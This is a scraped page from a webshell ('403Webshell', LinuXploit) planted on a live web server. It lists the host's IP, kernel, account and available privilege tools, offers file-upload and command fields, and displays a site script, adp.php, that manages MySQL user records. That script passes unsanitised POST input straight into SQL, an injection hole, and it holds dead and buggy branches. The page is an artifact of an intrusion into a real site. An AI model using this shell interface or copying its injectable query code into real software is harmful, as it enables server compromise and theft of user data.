403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.45
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/jenniqueadams.com/htdocs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/jenniqueadams.com/htdocs//adp.php
<?php
#security
#this one should be edited
//test cvs
//$allow_from='66.230.168.14';
$allow_from[]='127.0.0.1';
$allow_from[]='127.0.0.2';
$allow_from[]='64.59.71.224';
$enc_method = 'ENCRYPT'; //MD5|ENCRYPT|leave blank for unencrypted passwords
#comment the line above to allow access from all ips
#end securirty
######################### you should NOT edit any of these below######################
#  script expects $CMD variable to get the data
#  format of the DSN
# host|user|pass|database|tablename|username_field|password_field
#######################################################################################
$src = $_SERVER['REMOTE_ADDR'];
$ip_found = false;
foreach ($allow_from as $value)
{
    if ($src == $value) $ip_found = true;
}
if (!$ip_found)
{
   print "wrong ip $src";
   die;
}

$credentials[0];
header("Content-type: text/plain");
if (strstr($_POST[data], '\\\|')) $_POST[data] = str_replace('\\\|', '|', $_POST[data]);
$data_ar= explode(',',$_POST[data]);
$DSN=$data_ar[1];
$credentials=explode('|',$DSN);
$host=$credentials[0];
$user=$credentials[1];
$pass=$credentials[2];
$db=$credentials[3];
$tablename=$credentials[4];
$username_field=$credentials[5];
$password_field=$credentials[6];

$data = $_POST[data];

if(!mysql_connect($host,$user,$pass)) {echo "MySQL error 1";exit;}
if(!mysql_select_db($db)) {echo "MySQL error 2";exit;}

if($data_ar[0]=='CHECK' || $data_ar[0]=='DELETE')
{
    list($command, $ht_file, $user) = split(',',$data);
    if(strlen($user) < 3) die;
    if($data_ar[0]=='CHECK')
    {
        $sql = "select $password_field from $tablename where $username_field='$user'";
        $q = mysql_query($sql);
        $r = mysql_fetch_array($q);
        if($r[0])#found
        print "FOUND";
        else#not found
        print "NOT_FOUND";
    }
    else
    {#DEL OR CHECK
        $sql = "delete from $tablename where $username_field='$user'";
        $q = mysql_query($sql);
        if($q)
        print"DELETED $user";
        else
        print mysql_error();
    }#DEL OR CHECK
}
elseif($data_ar[0]=='ADD')
{
    list($command, $ht_file, $user, $password) = split(',',$data);
    if(strlen($user) < 3) die("Username too short\n");
    $sql = "delete from $tablename where $username_field='$user'";
    $q = mysql_query($sql) or die("$sql\n".mysql_error());
    $sql = "insert into $tablename ($username_field,$password_field) values('$user',$enc_method('$password'))";
    $q = mysql_query($sql) or die("$sql\n".mysql_error());
    print "ADDED";
}
elseif($data_ar[0]=='CHECK')
{
    list($command, $ht_file, $users_pwds) = split(' ',$data);
    $user_pwd_array = split(',',$users_pwds);
    for ($i=0;$i<count($user_pwd_array);$i++)
    {
        list($user,$password)=split(':',$user_pwd_array[$i]);
        $sql = "delete from $tablename where $username_field='$user'";
        $q = mysql_query($sql);
        $sql = "insert into $tablename ($username_field,$password_field) values('$user',$enc_method('$password'))";
        if($ql) print "$user ADDED\n";
        else print "$sql\n".mysql_error();
    }
}
else echo "Unknown command\n";
?>

Youez - 2016 - github.com/yon3zu
LinuXploit